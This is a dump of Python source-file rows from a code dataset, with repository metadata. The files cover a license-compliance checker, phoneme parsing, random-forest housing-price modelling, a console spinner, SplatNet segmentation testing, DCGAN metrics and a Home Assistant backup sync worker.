parser.add_argument('--java-deps-format', dest='java_dependencies_format', required=True,
help='format of dependencies file (CSV or XML)')
return parser.parse_args(sys.argv[1:])
def main(inner_args):
all_dependencies = retrieve_all_dependencies(inner_args.java_dependencies_file, inner_args.java_dependencies_format)
all_dependencies_file = 'oss_license_compliance_report_%s.csv' % inner_args.java_dependencies_file.replace('/','-').replace('.','')
print('Saving all dependencies as %s' % all_dependencies_file)
save_dependencies_as_csv(all_dependencies, "cache/" + all_dependencies_file)
if should_fail_build(all_dependencies):
print("\nAt least one of the dependencies is not compliant - please see %s for more info" % all_dependencies_file)
print("\nYou can filter the dependencies by the 'Compliant' column")
if inner_args.fail_build == 'yes':
print("--fail-build set to 'yes', returning an error code")
sys.exit(1)
print('*** OSS Licenses Check')
args = args_parsing()
WHITE_LISTED_LICENSES = load_white_listed_licenses(LICENSES_WHITE_LIST_FILE)
WHITE_LISTED_PACKAGES = load_white_listed_packages(PACKAGES_WHITE_LIST_FILE)
main(args)
| 40.652174 | 135 | 0.673904 | 1,098 | 9,350 | 5.442623 | 0.173042 | 0.092035 | 0.057229 | 0.02008 | 0.262383 | 0.194444 | 0.150268 | 0.118809 | 0.104752 | 0.059906 | 0 | 0.002435 | 0.209305 | 9,350 | 229 | 136 | 40.829694 | 0.805897 | 0.022353 | 0 | 0.097297 | 0 | 0 | 0.198424 | 0.02167 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081081 | false | 0 | 0.037838 | 0 | 0.210811 | 0.07027 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10bfed5cbc51ad7c7539fdeda3a165f6867a4380 | 2,791 | py | Python | poetics/classes/word.py | M-R-Epstein/poetics | 6331517c22ca567b9c68e2c668f670855e2ba618 | [
"MIT"
] | 4 | 2019-02-21T20:53:57.000Z | 2022-03-12T16:36:02.000Z | poetics/classes/word.py | M-R-Epstein/poetics | 6331517c22ca567b9c68e2c668f670855e2ba618 | [
"MIT"
] | 1 | 2019-02-19T14:37:29.000Z | 2019-02-19T14:37:29.000Z | poetics/classes/word.py | M-R-Epstein/poetics | 6331517c22ca567b9c68e2c668f670855e2ba618 | [
"MIT"
] | null | null | null | import logging
from poetics.lookups import get_pronunciations, check_onomatopoetic
from poetics.classes.pronunciation import Pronunciation
from poetics.stemmer import stem
class Word:
def __init__(self, word, user_pronunciation=None, parent=None):
self.parent = parent
self.token = word
self.stem = stem(word)
self.pronunciations = None
self.onomatopoetic = check_onomatopoetic(word)
# Deal with user provided pronunciations.
if user_pronunciation:
vowels = ['AA', 'AE', 'AH', 'AO', 'AW', 'AX', 'AY', 'EH', 'ER', 'EY', 'IH', 'IX', 'IY', 'OW', 'OY', 'UH',
'UW']
logging.info("Pronunciation for \"%s\" provided as \"%s\"", word, user_pronunciation)
out_pronunciation = []
f_pronunciations = []
syllables = user_pronunciation.split('-')
for syllable in syllables:
syllable_out = ["", "", "", ""]
strip = syllable.strip()
if "1" in strip:
syllable_out[0] = 1
strip = strip.replace("1", "")
                else:
                    syllable_out[0] = 0
                    # Strip unstressed (0) and secondary-stress (2) markers so
                    # the remaining symbol matches the plain vowels list above.
                    strip = strip.replace("0", "").replace("2", "")
split = strip.split()
onset = []
coda = []
try:
nucleus = next(phoneme for phoneme in split if phoneme in vowels)
syllable_out[2] = nucleus
nucleus_index = split.index(nucleus)
for phoneme in split[:nucleus_index]:
onset.append(phoneme)
syllable_out[1] = ' '.join(onset)
for phoneme in split[nucleus_index + 1:]:
coda.append(phoneme)
syllable_out[3] = ' '.join(coda)
except StopIteration:
for phoneme in split:
onset.append(phoneme)
syllable_out[1] = ' '.join(onset)
out_pronunciation.append(syllable_out)
f_pronunciations.append(Pronunciation(out_pronunciation, self))
self.pronunciations = tuple(f_pronunciations)
# If there isn't a user provided pronunciation, get a pronunciation.
else:
f_pronunciations = []
pronunciations = get_pronunciations(word)
if pronunciations:
for pronunciation in pronunciations:
f_pronunciations.append(Pronunciation(pronunciation, self))
self.pronunciations = tuple(f_pronunciations)
def __str__(self) -> str:
return self.token
def __repr__(self) -> str:
return '%s (%s)' % (super().__repr__(), self.token)
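def _word_example():
    # Hedged usage sketch (hypothetical pronunciation string, not part of the
    # original module): syllables are dash-separated ARPAbet phonemes, with a
    # trailing 1 marking primary stress on the vowel.
    return Word("hello", user_pronunciation="HH AH - L OW1")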
| 41.656716 | 117 | 0.52741 | 264 | 2,791 | 5.409091 | 0.306818 | 0.061625 | 0.033613 | 0.047619 | 0.172269 | 0.172269 | 0.131653 | 0.054622 | 0 | 0 | 0 | 0.006814 | 0.369043 | 2,791 | 66 | 118 | 42.287879 | 0.804089 | 0.037979 | 0 | 0.172414 | 0 | 0 | 0.030201 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051724 | false | 0 | 0.068966 | 0.034483 | 0.172414 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10c26729944d8e47d9f5c6b192937359e48e63ef | 4,584 | py | Python | housing_prices_kaggle/results/2020-04-29/runall.py | be2112/modeling_projects | db870ad684d31f1c95b66a782c8bbffacb55c352 | [
"MIT"
] | null | null | null | housing_prices_kaggle/results/2020-04-29/runall.py | be2112/modeling_projects | db870ad684d31f1c95b66a782c8bbffacb55c352 | [
"MIT"
] | null | null | null | housing_prices_kaggle/results/2020-04-29/runall.py | be2112/modeling_projects | db870ad684d31f1c95b66a782c8bbffacb55c352 | [
"MIT"
] | null | null | null | # runall.py
from collections import OrderedDict
from sklearn.ensemble import RandomForestRegressor
from sklearn.impute import SimpleImputer
from sklearn.model_selection import ShuffleSplit
from sklearn.pipeline import Pipeline
from sklearn.pipeline import make_pipeline, FeatureUnion
from sklearn.preprocessing import OneHotEncoder
from lib_bre import *
from lib_bre import ColumnSelector, TypeSelector, CategoricalEncoder
# Load training data
data_file = get_dataset_file_path('2020-04-13', 'train.csv')
train = pd.read_csv(data_file)
# Remove label
X_train = train.drop(columns='SalePrice')
y_train = train['SalePrice'].copy()
# Variables to use in the model
x_cols = ['MSSubClass', 'MSZoning', 'LotFrontage', 'LotArea', 'Street', 'LotShape', 'LandContour', 'Utilities',
'LotConfig', 'LandSlope', 'Neighborhood', 'Condition1', 'Condition2', 'BldgType', 'HouseStyle', 'OverallQual',
'OverallCond', 'YearBuilt', 'YearRemodAdd', 'RoofStyle', 'RoofMatl', 'Exterior1st', 'Exterior2nd',
'MasVnrType', 'MasVnrArea', 'ExterQual', 'ExterCond', 'Foundation', 'BsmtQual', 'BsmtCond', 'BsmtExposure',
'BsmtFinType1', 'BsmtFinSF1', 'BsmtFinType2', 'BsmtFinSF2', 'BsmtUnfSF', 'TotalBsmtSF', 'Heating',
'HeatingQC', 'CentralAir', 'Electrical', '1stFlrSF', '2ndFlrSF', 'LowQualFinSF', 'GrLivArea', 'BsmtFullBath',
'BsmtHalfBath', 'FullBath', 'HalfBath', 'BedroomAbvGr', 'KitchenAbvGr', 'KitchenQual', 'TotRmsAbvGrd',
'Functional', 'Fireplaces', 'GarageType', 'GarageYrBlt', 'GarageFinish', 'GarageCars', 'GarageArea',
'GarageQual', 'GarageCond', 'PavedDrive', 'WoodDeckSF', 'OpenPorchSF', 'EnclosedPorch', '3SsnPorch',
'ScreenPorch', 'PoolArea', 'MiscVal', 'MoSold', 'YrSold', 'SaleType', 'SaleCondition']
# Build preprocessing pipeline
preprocess_pipeline = make_pipeline(
ColumnSelector(columns=x_cols),
CategoricalEncoder(),
FeatureUnion(transformer_list=[
("numeric_features", make_pipeline(
TypeSelector(np.number),
SimpleImputer(missing_values=np.nan, strategy='median'),
)),
("categorical_features", make_pipeline(
TypeSelector("category"),
SimpleImputer(strategy="most_frequent"),
OneHotEncoder()
))
])
)
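# A hedged sanity check (hypothetical helper, not in the original script):
# fitting the preprocessing pipeline on a frame and inspecting the resulting
# design-matrix shape confirms how far one-hot encoding expands the columns.
def check_preprocessed_shape(frame):
    return preprocess_pipeline.fit_transform(frame).shape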
log2_forest = Pipeline(steps=[
('preprocess', preprocess_pipeline),
('decision_tree',
RandomForestRegressor(warm_start=True, max_features='log2', max_depth=20, oob_score=True, random_state=79,
n_jobs=-1))
])
sqrt_forest = Pipeline(steps=[
('preprocess', preprocess_pipeline),
('decision_tree',
RandomForestRegressor(warm_start=True, max_features='sqrt', max_depth=20, oob_score=True, random_state=79,
n_jobs=-1))
])
auto_forest = Pipeline(steps=[
('preprocess', preprocess_pipeline),
('decision_tree',
RandomForestRegressor(warm_start=True, max_features='auto', max_depth=20, oob_score=True, random_state=79,
n_jobs=-1))
])
ensemble_regressors = [
("RandomForestRegressor, max_features=log2", log2_forest),
("RandomForestRegressor, max_features=sqrt", sqrt_forest),
("RandomForestRegressor, max_features=auto", auto_forest),
]
error_rate = OrderedDict((label, []) for label, _ in ensemble_regressors)
# range of 'n_trees' to explore'
min_trees = 20
max_trees = 200
for label, reg in ensemble_regressors:
for i in range(min_trees, max_trees + 1):
reg.steps[1][1].set_params(n_estimators=i)
reg.fit(X_train, y_train)
oob_error = 1 - reg.steps[1][1].oob_score_
error_rate[label].append((i, oob_error))
# Generate test error vs n_trees plot
for label, clf_err in error_rate.items():
xs, ys = zip(*clf_err)
plt.plot(xs, ys, label=label)
plt.xlim(min_trees, max_trees)
plt.xlabel("n_estimators")
plt.ylabel("OOB error rate")
plt.legend(loc="upper right")
plt.savefig('test_errors.png', dpi=100)
plt.show()
# %%
# Plot Learning Curve for Best Model
fig, axes = plt.subplots(3, 1, figsize=(10, 15))
title = "Learning Curves (Random Forest Regressor, max_features=auto, max_depth=20)"
cv = ShuffleSplit(n_splits=10, test_size=0.2, random_state=34)
X_train = preprocess_pipeline.fit_transform(X_train)
estimator = RandomForestRegressor(warm_start=True, max_features='auto', max_depth=20, oob_score=True, n_estimators=200,
random_state=79, n_jobs=-1)
plot_learning_curve(estimator, title, X_train, y_train, axes=axes, ylim=(0.6, 1.01))
plt.savefig('learning_curve.svg')
| 39.86087 | 120 | 0.695462 | 522 | 4,584 | 5.908046 | 0.440613 | 0.028534 | 0.016213 | 0.044099 | 0.18677 | 0.179637 | 0.16537 | 0.16537 | 0.16537 | 0.16537 | 0 | 0.020708 | 0.167757 | 4,584 | 114 | 121 | 40.210526 | 0.78768 | 0.044721 | 0 | 0.149425 | 0 | 0 | 0.268711 | 0.015106 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.103448 | 0 | 0.103448 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10c2820d996e4ee29bd411bddd15d40dc887279b | 1,235 | py | Python | colourz/spinners.py | alexmacniven/colour | 3565f1da670bcc26858db52db6bee40c06f29f9a | [
"MIT"
] | null | null | null | colourz/spinners.py | alexmacniven/colour | 3565f1da670bcc26858db52db6bee40c06f29f9a | [
"MIT"
] | 2 | 2019-04-03T14:54:31.000Z | 2020-03-24T16:27:48.000Z | colourz/spinners.py | alexmacniven/colour | 3565f1da670bcc26858db52db6bee40c06f29f9a | [
"MIT"
] | 1 | 2019-03-21T14:06:23.000Z | 2019-03-21T14:06:23.000Z | import sys
import threading
import time
class Bullets:
@staticmethod
def spinning_cursor():
        # Animation frames: the dash slides right across the 5-slot track,
        # then bounces back (the 7-char frame plus a space matches the
        # len(msg) + 8 line length used in stop()).
        c = [
            "[-    ]",
            "[ -   ]",
            "[  -  ]",
            "[   - ]",
            "[    -]",
            "[   - ]",
            "[  -  ]",
            "[ -   ]"
        ]
while 1:
for cursor in c:
yield cursor
def __init__(self, msg="Working on it..."):
self.spinner_generator = self.spinning_cursor()
self.busy = False
self.delay = 0.1
self.msg = msg
self.linelen = len(msg) + 8
def spinner_task(self):
while self.busy:
sys.stdout.write(
"{0} {1}".format(
next(self.spinner_generator),
self.msg
)
)
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\r')
sys.stdout.flush()
def start(self):
self.busy = True
threading.Thread(target=self.spinner_task).start()
def stop(self):
self.busy = False
time.sleep(self.delay)
spacers = " " * self.linelen
sys.stdout.write("\r{0}\r".format(spacers))
| 23.301887 | 58 | 0.42915 | 116 | 1,235 | 4.482759 | 0.387931 | 0.086538 | 0.080769 | 0.092308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010057 | 0.436437 | 1,235 | 52 | 59 | 23.75 | 0.737069 | 0 | 0 | 0.288889 | 0 | 0 | 0.072065 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.066667 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10c3b9550e1437e1be83b2829d5baa30281f891a | 9,785 | py | Python | Spatial-Transformer-PCD/sampling-based/splatnet/semseg3d/test.py | tamaslevente/trai | 4bf68463b941f305d9b25a9374b6c2a2d51a8046 | [
"MIT"
] | null | null | null | Spatial-Transformer-PCD/sampling-based/splatnet/semseg3d/test.py | tamaslevente/trai | 4bf68463b941f305d9b25a9374b6c2a2d51a8046 | [
"MIT"
] | null | null | null | Spatial-Transformer-PCD/sampling-based/splatnet/semseg3d/test.py | tamaslevente/trai | 4bf68463b941f305d9b25a9374b6c2a2d51a8046 | [
"MIT"
] | null | null | null | """
Copyright (C) 2018 NVIDIA Corporation. All rights reserved.
Licensed under the CC BY-NC-SA 4.0 license (https://creativecommons.org/licenses/by-nc-sa/4.0/legalcode).
"""
import os
import glob
import argparse
import time
import numpy as np
import caffe
import splatnet.configs
from splatnet.utils import modify_blob_shape
from splatnet import plot_log
EVAL_SCRIPT_PATH = os.path.join(splatnet.configs.ROOT_DIR, 'splatnet', 'semseg3d', 'eval_seg.py')
def extract_feat_scene(network_path, weights_path, feed, out_names, batch_size=1, sample_size=-1):
net = caffe.Net(network_path, weights_path, caffe.TEST)
net_bs, _, _, net_ss = net.blobs[list(feed.keys())[0]].data.shape
npt = list(feed.values())[0].shape[-1]
if sample_size == -1:
sample_size = npt
elif sample_size == 0:
sample_size = net_ss
else:
assert sample_size * batch_size <= npt
if net_bs != batch_size or net_ss != sample_size:
network_path = modify_blob_shape(network_path, feed.keys(), {0: batch_size, 3: sample_size})
net = caffe.Net(network_path, weights_path, caffe.TEST)
if type(out_names) == str:
out_names = (out_names,)
single_target = True
else:
single_target = False
outs = {v: [] for v in out_names}
pts_per_batch = batch_size * sample_size
for b in range(int(np.ceil(npt / pts_per_batch))):
b_end = min(pts_per_batch * (b + 1), npt)
b_slice = slice(b_end - pts_per_batch, b_end)
bs = min(pts_per_batch, npt - pts_per_batch * b)
for in_key in feed:
net.blobs[in_key].data[...] \
= feed[in_key][:, :, :, b_slice].reshape(-1, batch_size, sample_size, 1).transpose(1, 0, 3, 2)
net.forward()
for out_key in out_names:
out_sz = net.blobs[out_key].data.shape
out = net.blobs[out_key].data.transpose(1, 2, 0, 3).reshape(1, out_sz[1], out_sz[2], -1)[:, :, :, -bs:]
outs[out_key].append(out.copy())
result = {v: np.concatenate(outs[v], axis=3) for v in out_names}
if single_target:
result = result[out_names[0]]
return result
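# Hedged usage sketch (hypothetical file names, not from the repo): feed a
# (1, C, 1, N) point blob and collect the per-point class probabilities,
# letting the deployed network's own sample size drive the batching:
#
#   probs = extract_feat_scene('net_deploy.prototxt', 'weights.caffemodel',
#                              feed={'data': pts}, out_names='prob',
#                              sample_size=0)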
def semseg_test(dataset, network, weights, input_dims='nx_ny_nz_r_g_b_h', sample_size=-1,
dataset_params=None, save_dir='', save_prefix='', use_cpu=False):
"""
Testing trained semantic segmentation network
:param dataset: choices: 'facade', 'stanford3d'
:param network: path to a .prototxt file
:param weights: path to a .caffemodel file
:param input_dims: feat dims and scales
:param sample_size: -1 -- use all points in a single sample, 0 -- use the size in network
:param dataset_params: a dict with optional dataset parameters
:param save_dir: default ''
:param save_prefix: default ''
:param use_cpu: default False
:return:
"""
if use_cpu:
caffe.set_mode_cpu()
else:
caffe.set_mode_gpu()
caffe.set_device(0)
# dataset specific: data, xyz, cmap
if dataset == 'facade':
from splatnet.dataset import dataset_facade
dataset_params_new = {} if not dataset_params else dataset_params
dataset_params = dict(subset='test', val_ratio=0.0) # default values
dataset_params.update(dataset_params_new)
for v in {'val_ratio'}:
if v in dataset_params:
dataset_params[v] = float(dataset_params[v])
data, xyz, norms = dataset_facade.points(dims=input_dims+',x_y_z,nx_ny_nz', **dataset_params)
cmap = splatnet.configs.FACADE_CMAP
elif dataset == 'stanford3d':
norms = None
pass # TODO set cmap, data, xyz
else:
raise ValueError('Unsupported dataset: {}'.format(dataset))
tic = time.time()
prob = extract_feat_scene(network, weights,
feed=dict(data=data.transpose().reshape(1, -1, 1, len(data))),
out_names='prob',
sample_size=sample_size)
elapsed = time.time() - tic
pred = prob.argmax(axis=1).squeeze()
if norms is None:
out = np.array([np.concatenate((x, cmap[int(c)]), axis=0) for (x, c) in zip(xyz, pred)])
header = '''ply
format ascii 1.0
element vertex {}
property float x
property float y
property float z
property uchar diffuse_red
property uchar diffuse_green
property uchar diffuse_blue
end_header'''.format(len(data))
fmt = '%.6f %.6f %.6f %d %d %d'
else:
out = np.array([np.concatenate((x, n, cmap[int(c)]), axis=0) for (x, n, c) in zip(xyz, norms, pred)])
header = '''ply
format ascii 1.0
element vertex {}
property float x
property float y
property float z
property float nx
property float ny
property float nz
property uchar diffuse_red
property uchar diffuse_green
property uchar diffuse_blue
end_header'''.format(len(data))
fmt = '%.6f %.6f %.6f %.6f %.6f %.6f %d %d %d'
save_path = os.path.join(save_dir, '{}pred_{}.ply'.format(save_prefix, dataset_params['subset']))
np.savetxt(save_path, out, fmt=fmt, header=header, comments='')
return save_path, elapsed, len(data)
if __name__ == '__main__':
parser = argparse.ArgumentParser(add_help=False)
group = parser.add_argument_group('testing options')
group.add_argument('dataset')
group.add_argument('--dataset_params', nargs='+', help='dataset-specific parameters (key value pairs)')
group.add_argument('--input', default='nx_ny_nz_r_g_b_h', help='features to use as input')
group.add_argument('--cpu', action='store_true', help='use cpu')
group.add_argument('--exp_dir', default=None, type=str, help='together with exp_prefix, set defaults to args below')
group.add_argument('--exp_prefix', default='', type=str, help='together with exp_dir, set defaults to args below')
group.add_argument('--network', default=None, type=str, help='a .prototxt file')
group.add_argument('--weights', default=None, type=str, help='a .caffemodel file')
group.add_argument('--sample_size', default=-1, type=int, help='testing sample size')
group.add_argument('--log', default=None, type=str, help='a .log file with training logs')
group.add_argument('--log_eval', default=None, type=str, help='path to write evaluation logs')
group.add_argument('--save_dir', default=None, type=str, help='together with save_prefix, a place for predictions')
group.add_argument('--save_prefix', default=None, type=str, help='together with save_dir, a place for predictions')
group = parser.add_argument_group('evaluation options')
group.add_argument('--gt', default=None, type=str, help='path to ground-truth')
group.add_argument('--gt_rgb', action='store_true', help='turn this on if gt is encoded with rgb values')
group.add_argument('--gt_column', type=int, default=11, help='(starting) column of label in gt (1-index)')
parser = argparse.ArgumentParser(description='Testing trained semantic segmentation network',
parents=[parser], formatter_class=argparse.ArgumentDefaultsHelpFormatter)
args = parser.parse_args()
network, weights = args.network, args.weights
save_dir, save_prefix = args.save_dir, args.save_prefix
log_train = args.log
log_eval = args.log_eval
if args.exp_dir is not None:
if args.exp_prefix:
exp_prefix = args.exp_prefix + '_'
snapshot_prefix = exp_prefix
else:
exp_prefix = ''
snapshot_prefix = 'snapshot_'
if network is None:
network = os.path.join(args.exp_dir, exp_prefix + 'net_deploy.prototxt')
if weights is None:
last_iter = max([int(os.path.split(v)[1].split('_')[-1][:-11]) for v in
glob.glob(os.path.join(args.exp_dir, snapshot_prefix + 'iter_*.caffemodel'))])
weights = os.path.join(args.exp_dir, '{}iter_{}.caffemodel'.format(snapshot_prefix, last_iter))
if log_train is None:
log_train = os.path.join(args.exp_dir, exp_prefix + 'train.log')
if not os.path.exists(log_train):
log_train = ''
if save_dir is None:
save_dir = args.exp_dir
if save_prefix is None:
save_prefix = exp_prefix
if log_eval is None:
log_eval = os.path.join(args.exp_dir, exp_prefix + 'test.log')
if not args.dataset_params:
args.dataset_params = {}
else:
args.dataset_params = dict(zip(args.dataset_params[::2], args.dataset_params[1::2]))
pred_path, elapsed, num_pts = semseg_test(args.dataset, network, weights, args.input, args.sample_size,
args.dataset_params, save_dir, save_prefix, args.cpu)
if log_eval:
with open(log_eval, 'a') as f:
f.write('Predictions saved to {}.\n'.format(pred_path))
f.write('{} points evaluated in {:.2f} secs.\n'.format(num_pts, elapsed))
if args.gt is not None:
import subprocess
subprocess.run('python {} --dataset {} {}'
'{} --pred_rgb --pred_column 7 '
'{} {}--gt_column {}'.format(EVAL_SCRIPT_PATH,
args.dataset,
'--log {} '.format(log_eval) if log_eval else '',
os.path.abspath(pred_path),
os.path.abspath(args.gt),
'--gt_rgb ' if args.gt_rgb else '',
args.gt_column).split(' '))
if log_train:
plot_log.parse_and_plot(log_train)
| 41.995708 | 120 | 0.626265 | 1,352 | 9,785 | 4.328402 | 0.195266 | 0.044429 | 0.043746 | 0.024607 | 0.238893 | 0.178913 | 0.145079 | 0.126282 | 0.078606 | 0.064252 | 0 | 0.010211 | 0.249361 | 9,785 | 232 | 121 | 42.176724 | 0.786521 | 0.07256 | 0 | 0.171271 | 0 | 0 | 0.179931 | 0 | 0 | 0 | 0 | 0.00431 | 0.005525 | 1 | 0.01105 | false | 0.005525 | 0.066298 | 0 | 0.088398 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10c432e6abf57e89ba6b4e43e6f68aa1e3b62483 | 3,284 | py | Python | lib/metrics.py | nobodykid/dcgan_code | be7ddca6abd34cb5436b8304bf956cff8c40f3f2 | [
"MIT"
] | null | null | null | lib/metrics.py | nobodykid/dcgan_code | be7ddca6abd34cb5436b8304bf956cff8c40f3f2 | [
"MIT"
] | null | null | null | lib/metrics.py | nobodykid/dcgan_code | be7ddca6abd34cb5436b8304bf956cff8c40f3f2 | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
import theano
import theano.tensor as T
import gc
import time
from theano_utils import floatX
from ops import euclidean, cosine
from sklearn import metrics
from sklearn.linear_model import LogisticRegression as LR
def cv_reg_lr(trX, trY, vaX, vaY, Cs=[0.01, 0.05, 0.1, 0.5, 1., 5., 10., 50., 100.]):
tr_accs = []
va_accs = []
models = []
for C in Cs:
model = LR(C=C)
model.fit(trX, trY)
tr_pred = model.predict(trX)
va_pred = model.predict(vaX)
tr_acc = metrics.accuracy_score(trY, tr_pred)
va_acc = metrics.accuracy_score(vaY, va_pred)
print('%.4f %.4f %.4f'%(C, tr_acc, va_acc))
tr_accs.append(tr_acc)
va_accs.append(va_acc)
models.append(model)
best = np.argmax(va_accs)
print('best model C: %.4f tr_acc: %.4f va_acc: %.4f'%(Cs[best], tr_accs[best], va_accs[best]))
return models[best]
def gpu_nnc_predict(trX, trY, teX, metric='cosine', batch_size=4096):
if metric == 'cosine':
metric_fn = cosine_dist
else:
metric_fn = euclid_dist
idxs = []
for i in range(0, len(teX), batch_size):
mb_dists = []
mb_idxs = []
for j in range(0, len(trX), batch_size):
dist = metric_fn(floatX(teX[i:i+batch_size]), floatX(trX[j:j+batch_size]))
if metric == 'cosine':
mb_dists.append(np.max(dist, axis=1))
mb_idxs.append(j+np.argmax(dist, axis=1))
else:
mb_dists.append(np.min(dist, axis=1))
mb_idxs.append(j+np.argmin(dist, axis=1))
mb_idxs = np.asarray(mb_idxs)
mb_dists = np.asarray(mb_dists)
if metric == 'cosine':
i = mb_idxs[np.argmax(mb_dists, axis=0), np.arange(mb_idxs.shape[1])]
else:
i = mb_idxs[np.argmin(mb_dists, axis=0), np.arange(mb_idxs.shape[1])]
idxs.append(i)
idxs = np.concatenate(idxs, axis=0)
nearest = trY[idxs]
return nearest
def gpu_nnd_score(trX, teX, metric='cosine', batch_size=4096):
if metric == 'cosine':
metric_fn = cosine_dist
else:
metric_fn = euclid_dist
dists = []
for i in range(0, len(teX), batch_size):
mb_dists = []
for j in range(0, len(trX), batch_size):
dist = metric_fn(floatX(teX[i:i+batch_size]), floatX(trX[j:j+batch_size]))
if metric == 'cosine':
mb_dists.append(np.max(dist, axis=1))
else:
mb_dists.append(np.min(dist, axis=1))
mb_dists = np.asarray(mb_dists)
if metric == 'cosine':
d = np.max(mb_dists, axis=0)
else:
d = np.min(mb_dists, axis=0)
dists.append(d)
dists = np.concatenate(dists, axis=0)
return float(np.mean(dists))
A = T.matrix()
B = T.matrix()
ed = euclidean(A, B)
cd = cosine(A, B)
cosine_dist = theano.function([A, B], cd)
euclid_dist = theano.function([A, B], ed)
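def _distance_example():
    # Hedged sketch (hypothetical data, not part of the original module): both
    # compiled Theano functions return a pairwise distance matrix of shape
    # (len(a), len(b)), as relied upon by gpu_nnc_predict above.
    a = floatX(np.random.randn(4, 8))
    b = floatX(np.random.randn(6, 8))
    return euclid_dist(a, b).shape, cosine_dist(a, b).shape  # (4, 6) each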
def nnc_score(trX, trY, teX, teY, metric='euclidean'):
pred = gpu_nnc_predict(trX, trY, teX, metric=metric)
acc = metrics.accuracy_score(teY, pred)
return acc*100.
def nnd_score(trX, teX, metric='euclidean'):
return gpu_nnd_score(trX, teX, metric=metric)
| 32.84 | 98 | 0.592266 | 502 | 3,284 | 3.713147 | 0.193227 | 0.052575 | 0.045064 | 0.023605 | 0.466738 | 0.426502 | 0.406652 | 0.381438 | 0.366416 | 0.32779 | 0 | 0.0225 | 0.269184 | 3,284 | 99 | 99 | 33.171717 | 0.754167 | 0 | 0 | 0.337079 | 0 | 0 | 0.037759 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05618 | false | 0 | 0.11236 | 0.011236 | 0.224719 | 0.022472 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10c5726cbf6c5c23694fc1846d272d5090d75571 | 1,130 | py | Python | hassio-google-drive-backup/backup/model/syncer.py | voxipbx/hassio-addons | ddf2f1745f4240c2905f9f9d7616a927fb8934e4 | [
"MIT"
] | 1 | 2022-01-22T18:27:04.000Z | 2022-01-22T18:27:04.000Z | hassio-google-drive-backup/backup/model/syncer.py | voxipbx/hassio-addons | ddf2f1745f4240c2905f9f9d7616a927fb8934e4 | [
"MIT"
] | 19 | 2021-09-29T06:13:25.000Z | 2022-03-08T06:13:49.000Z | hassio-google-drive-backup/backup/model/syncer.py | voxipbx/hassio-addons | ddf2f1745f4240c2905f9f9d7616a927fb8934e4 | [
"MIT"
] | 1 | 2021-12-12T19:31:05.000Z | 2021-12-12T19:31:05.000Z | from typing import List
from injector import inject, singleton
from .coordinator import Coordinator
from backup.time import Time
from backup.worker import Worker, Trigger
from backup.logger import getLogger
from backup.exceptions import PleaseWait
logger = getLogger(__name__)
@singleton
class Scyncer(Worker):
@inject
def __init__(self, time: Time, coord: Coordinator, triggers: List[Trigger]):
super().__init__("Sync Worker", self.checkforSync, time, 0.5)
self.coord = coord
self.triggers: List[Trigger] = triggers
self._time = time
async def checkforSync(self):
try:
doSync = False
for trigger in self.triggers:
if trigger.check():
logger.debug("Sync requested by " + str(trigger.name()))
doSync = True
if doSync:
while self.coord.isSyncing():
await self._time.sleepAsync(3)
await self.coord.sync()
except PleaseWait:
# Ignore this, since it means a sync already started (race condition)
pass
| 30.540541 | 81 | 0.621239 | 126 | 1,130 | 5.460317 | 0.468254 | 0.05814 | 0.034884 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003793 | 0.3 | 1,130 | 36 | 82 | 31.388889 | 0.865992 | 0.059292 | 0 | 0 | 0 | 0 | 0.027333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034483 | false | 0.034483 | 0.241379 | 0 | 0.310345 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10c684ce31863da0ee17c3411588cb6b1aa624c4 | 6,832 | py | Python | momo/plugins/flask/search.py | shichao-an/momo | 9996bc22b1d99d379633e18e94f4815e12435898 | [
"BSD-2-Clause"
